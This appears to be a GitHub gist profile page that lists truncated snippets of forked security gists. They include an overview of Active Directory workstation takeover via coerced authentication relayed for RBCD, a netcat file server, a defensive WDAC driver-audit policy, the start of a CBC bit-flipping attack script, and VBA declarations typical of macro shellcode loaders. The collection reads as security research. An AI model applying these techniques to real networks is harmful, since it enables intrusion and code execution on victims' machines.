Tom Yang TomYang9

  • Wellington, New Zealand
#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin


def js(domain):
    # Reuse one session so the custom header (and any cookies) persist across requests
    session = requests.Session()
    session.headers["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
    # Fetch the page and parse it; urljoin is imported to resolve relative links later in the gist
    html = session.get(domain).content
    soup = bs(html, "html.parser")
@TomYang9
TomYang9 / Workstation-Takeover.md
Created August 19, 2021 11:05 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished, in short, by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@TomYang9
TomYang9 / servefile.sh
Created March 4, 2021 09:47 — forked from talwai/servefile.sh
One-shot HTTP webserver to serve file contents using netcat
{ echo -ne "HTTP/1.0 200 OK\r\nContent-Length: $(wc -c <some.file)\r\n\r\n"; cat some.file; } | nc -l 8080
@TomYang9
TomYang9 / Non_Microsoft_Driver_Load_Audit.xml
Created March 4, 2021 09:45 — forked from mgraeber-rc/Non_Microsoft_Driver_Load_Audit.xml
A WDAC audit-mode policy that will log all non-Windows-signed driver loads and any driver that is not WHQL or EV signed.
<?xml version="1.0" encoding="utf-8"?>
<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">
  <VersionEx>10.0.0.0</VersionEx>
  <PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>
  <PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
  <Rules>
    <Rule>
      <Option>Enabled:Unsigned System Integrity Policy</Option>
    </Rule>
    <Rule>
@TomYang9
TomYang9 / bit-flipping-attack.py
Created March 2, 2021 10:08 — forked from nil0x42/bit-flipping-attack.py
Simple, easy to understand implementation of Bit-Flipping attack on CBC mode
#!/usr/bin/python3 -u
# requirements: PyCryptodome
import base64
import subprocess
from Crypto.Util.strxor import strxor
from Crypto.Util.Padding import pad
### variables to set
PLAINTEXT = b"id=12345678;name=myname;is_admin=false;[email protected]"
Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As Long, ByVal offsetinVft As Long, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As Long, ByRef retVAR As Variant) As Long
Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Const CC_STDCALL = 4
Const MEM_COMMIT = &H1000
Const PAGE_EXECUTE_READWRITE = &H40
Private VType(0 To 63) As Integer, VPtr(0 To 63) As Long